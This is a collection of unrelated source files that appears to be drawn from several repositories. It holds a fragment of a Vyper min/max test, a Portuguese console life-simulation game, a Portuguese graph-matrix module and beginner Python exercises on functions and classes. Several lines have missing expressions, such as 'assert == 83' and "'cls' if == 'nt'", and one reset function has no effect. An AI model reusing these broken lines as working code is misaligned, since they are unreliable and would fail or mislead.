max(10, 20) + min(200.1, 400) + max(3000, 8000.02) + min(50000.003, 70000.004) def goo() -> num256: return num256_add(min(as_num256(3), as_num256(5)), max(as_num256(40), as_num256(80))) """ c = get_contract(minmax_test) assert == 58223.123 assert == 83 print("Passed min/max test") ```
{ "source": "01ch01/developer-inc", "score": 4 }
#### File: 01ch01/developer-inc/ ```python from os import name, system from variables import * # define global variables inventory = { "health": 10, "money": 10, "social": 10, "fame": 10, } scenarios = [ scenario01, scenario02, scenario03, scenario04, scenario05, scenario06, scenario07, scenario08, ] def clear_console(): system('cls' if name == 'nt'else'clear') def choose(): decision = 'null' while(decision != 'false' and decision != 'true'): decision = input((f'\n\tVocê aceita (true) ou recusa (false)? ')) decision = decision.lower().strip() if decision == 'true': return True elif decision == 'false': return False else: print('\n\t⚠️ Por favor, digite apenas "true" ou "false" ⚠️\n') def showMenu(): print("""\n ********************* ** DEVELOPER, INC. ** ********************* --------------------- | 0 - Iniciar jogo | | 1 - Créditos | | 2 - Sair | --------------------- \n""") def is_player_alive(inventory): flag = True for item_value in inventory.values(): if item_value <= 0: flag = False return flag def show_inventory(): global inventory print(f"""\n STATUS ATUAL: Saúde: {inventory['health']} Dinheiro: {inventory['money']} Vida social: {inventory['social']} Fama: {inventory['fame']} """) def start_game(): global scenarios global inventory reset_inventory(inventory) for scenario in scenarios: if is_player_alive(inventory) == False: game_over() break print(scenario) boolean_answer = choose() if scenario == scenario01: if boolean_answer: inventory['health'] -= 2 inventory['money'] += 2 inventory['social'] -= 3 inventory['fame'] += 1 else: inventory['health'] += 1 inventory['money'] -= 4 inventory['social'] += 1 inventory['fame'] -= 1 clear_console() show_inventory() elif scenario == scenario02: if boolean_answer: inventory['health'] += 2 inventory['money'] -= 4 inventory['social'] -= 0 inventory['fame'] += 2 else: inventory['health'] -= 2 inventory['money'] += 4 inventory['social'] += 0 inventory['fame'] -= 2 clear_console() show_inventory() elif scenario == scenario03: if boolean_answer: inventory['health'] += 1 inventory['money'] -= 5 inventory['social'] += 2 inventory['fame'] += 2 else: inventory['health'] -= 3 inventory['money'] += 4 inventory['social'] -= 4 inventory['fame'] -= 3 clear_console() show_inventory() elif scenario == scenario04: if boolean_answer: inventory['health'] -= 9 inventory['money'] -= 6 inventory['social'] += 8 inventory['fame'] += 5 else: inventory['health'] += 4 inventory['money'] += 8 inventory['social'] -= 4 inventory['fame'] -= 3 clear_console() show_inventory() elif scenario == scenario05: if boolean_answer: inventory['health'] += 9 inventory['money'] -= 8 inventory['social'] -= 0 inventory['fame'] += 0 else: inventory['health'] -= 9 inventory['money'] += 8 inventory['social'] += 0 inventory['fame'] -= 0 clear_console() show_inventory() elif scenario == scenario06: if boolean_answer: inventory['health'] += 5 inventory['money'] += 2 inventory['social'] += 8 inventory['fame'] -= 8 else: inventory['health'] -= 3 inventory['money'] -= 2 inventory['social'] -= 4 inventory['fame'] += 3 clear_console() show_inventory() elif scenario == scenario07: if boolean_answer: inventory['health'] -= 10 inventory['money'] += 8 inventory['social'] -= 11 inventory['fame'] += 10 else: inventory['health'] += 5 inventory['money'] -= 7 inventory['social'] += 2 inventory['fame'] -= 5 clear_console() show_inventory() elif scenario == scenario08: if boolean_answer: inventory['health'] -= 2 inventory['money'] -= 10 inventory['social'] -= 3 inventory['fame'] += 5 else: inventory['health'] += 1 inventory['money'] += 4 inventory['social'] += 1 inventory['fame'] -= 8 clear_console() show_inventory() # clear_console() pass clear_console() end_game() def reset_inventory(inventory): for item in inventory.values(): item = 10 def main(): while True: showMenu() menu_option = input("\n\tEscolha uma opção: ") if menu_option == '0': clear_console() presentation() clear_console() start_game() elif menu_option == '1': clear_console() show_credits() elif menu_option == '2': clear_console() bye() break else: print('\n\tFavor inserir uma opção válida!\n') if __name__ == "__main__": main() ```
{ "source": "01ch01/implementacao-grafos", "score": 4 }
#### File: 01ch01/implementacao-grafos/ ```python import os def clear_console(): os.system('cls' if == 'nt' else 'clear') def create_graph(): graph = {} qtd_vertices = int(input("Insira o número de vértices: ")) for i in range(qtd_vertices): graph[i+1] = [] while True: clear_console() print('\n*** Digite "-1" para terminar a criação do grafo ***\n') v1 = int(input('Insira um vértice: ')) if(v1 == -1): break v2 = int(input('Insira o vértice que se conecta: ')) graph[v1].append((v1, v2)) # graph[v2].append((v2, v1)) return graph def load_graph(): file = open('grafo.txt', 'r') qtd_vertices = int(file.readline()) graph = {} # writing vertices in graph for i in range(qtd_vertices): graph[i+1] = [] for line in file: line.split('\n') v1 = int(line[0]) v2 = int(line[2]) graph[v1].append((v1, v2)) file.close() print('\n\tGrafo carregado com sucesso!\n') return graph def save_graph(graph): file = open("grafo.txt", "w") stream = list() qtd_vertices = str(len(graph.keys())) stream.append(qtd_vertices+'\n') for edges in graph.values(): for edge in range(len(edges)): line = str(edges[edge]) # remove stuff line = line.replace(")", "") line = line.replace("(", "") line = line.replace(" ", "") line += '\n' stream.append(line) file.writelines(stream) file.close() print(f'\n\tGrafo salvo com sucesso!') def get_vertices(graph): vertices = [] for vertex in graph.keys(): vertices.append(vertex) return vertices def get_edges(graph): edges = [] for i in graph.values(): for j in range(len(i)): edge = i[j] edges.append(edge) return edges def adjacency_matrix(graph): vertices = get_vertices(graph) edges = get_edges(graph) matrix = [[0 for _ in vertices] for _ in vertices] for edge in edges: v1 = int(edge[0]) v2 = int(edge[1]) matrix[v1-1][v2-1] = 1 # mirror diagonals matrix[v2-1][v1-1] = 1 return matrix def incidence_matrix(graph): vertices = get_vertices(graph) edges = get_edges(graph) matrix = [[0 for _ in edges] for _ in vertices] for vertex in vertices: count = 0 for edge in edges: if(edge[0] == vertex and edge[1] == vertex): value = 2 elif (vertex in edge): value = 1 else: value = 0 matrix[(vertex-1)][count] = value count += 1 return matrix def adjacency_list(graph): vertices = get_vertices(graph) edges = get_edges(graph) adjacency_list = {} for vertex in vertices: neighbors = [] for edge in edges: if (vertex in edge): neighbor = edge[1 if(vertex == edge[0]) else 0] neighbors.append(neighbor) adjacency_list[vertex] = neighbors return adjacency_list def show(graph): print(f' Vértice\tAresta(s)\n') for vertex, edge in graph.items(): print(f'\t{vertex}:\t{edge}') ```
{ "source": "01coders/50-Days-Of-Code", "score": 4 }
#### File: 50-Days-Of-Code/python_MA1/ ```python def tax(bill): """Adds 8% tax to a restaurant bill.""" bill *= 1.08 print ("With tax: %f" % bill) return bill #2 def tip(bill): """Adds 15% tip to a restaurant bill.""" bill *= 1.15 print ("With tip: %f" % bill) return bill meal_cost = 100 meal_with_tax = tax(meal_cost) #108.00 meal_with_tip = tip(meal_with_tax) #124.20 #Functions 3 def square(n): """Returns the square of a number.""" squared = n ** 2 print ("%d squared is %d." % (n, squared)) return squared square(10) #100 #4 def power(base,exponent): result = base ** exponent print ("%d to the power of %d is %d." % (base, exponent, result)) power(5,3) #5 to the power of 3 is 125. #5 import math print(math.sqrt(25)) #5.0 #from math import * //imports all math functions #6 def biggest_number(*args): print (max(args)) return max(args) def smallest_number(*args): print (min(args)) return min(args) def distance_from_zero(arg): print (abs(arg)) return abs(arg) biggest_number(-10, -5, 5, 10) smallest_number(-10, -5, 5, 10) distance_from_zero(-10) #OUTPUT #10 #-10 #10 ``` #### File: 50-Days-Of-Code/python_MA1/ ```python def hotel_cost(days): return 140 * days def plane_ride_cost(city): if city == "Charlotte": return 183 elif city == "Tampa": return 220 elif city == "Pittsburgh": return 222 elif city == "Los Angeles": return 475 def rental_car_cost(days): cost = days * 40 if days >= 7: cost -= 50 elif days >= 3: cost -= 20 return cost def trip_cost(city, days, spending_money): return rental_car_cost(days) + hotel_cost(days) + plane_ride_cost(city) + spending_money print (trip_cost("Los Angeles", 5, 600)) #1955 #Break & Continue count=0 result=0 for count in range(1,10): result=result+count if result>6: break print("result=",result) #result=10 count=0 for count in range(0,10): if count<5: continue print(count) #5,6,7,8,9 ``` #### File: 50-Days-Of-Code/python_parikshith21/ ```python class vehicle: def __init__(self,wheels,capacity,fuel): self.w=wheels self.c=capacity self.f=fuel def display(self): print(self.w,self.c,self.f) car=vehicle(4,15,'petrol') car.display() car=vehicle(4,5,'diesel') car.display() # ============================================================================= # #output: # 4 15 petrol # 4 5 diesel # ============================================================================= bike=vehicle(2,5,'petrol') bike.display() # ============================================================================= # #output: # 2 5 petrol # ============================================================================= class vehicle: def __init__(self,wheels=0,capacity=0,fuel='diesel'): self.w=wheels self.c=capacity self.f=fuel def assign(self,wheels,capacity,fuel): self.w=wheels self.c=capacity self.f=fuel def display(self): print(self.w,self.c,self.f) car=vehicle(4,5,'petrol') car.display() # ============================================================================= # #output: # 4 5 petrol # ============================================================================= bike=vehicle() bike.display() # ============================================================================= # #output: # 0 0 diesel # ============================================================================= auto=vehicle() auto.display() # ============================================================================= # #output: # 0 0 diesel # ============================================================================= ``` #### File: 50-Days-Of-Code/python_parikshith21/ ```python class Date: def __init__(self,day,month,year): self.__day=day self.__month=month self.__year=year def get_day(self): return self.__day def get_month(self): return self.__month def get_year(self): return self.__year def set_day(self,value): self.__day=value def set_month(self,value): self.__month=value def set_year(self,value): self.__year=value class customer: def __init__(self,name,num,dob): self.__name=name self.__num=num self.__dob=dob def get_name(self): return self.__name def get_num(self): return self.__num def get_dob(self): return self.__dob def set_name(self,value): self.__name=value def set_num(self,value): self.__num=value def set_dob(self,value): self.__dob=value d=Date(13,11,1998) c1=customer("Manoj",7204444566,d) print(c1.get_name(),c1.get_num(),c1.get_dob().get_day()) #Manoj 7203344566 13 temp=c1.get_dob() print(temp.get_day()) #13 temp.set_year(1999) print(temp.get_day(),temp.get_month(),temp.get_year()) #13 11 1999 c1.get_dob().set_year(2000) # ============================================================================= # #output: # Manoj 7204444566 13 # 13 # 13 11 1999 # ============================================================================= ```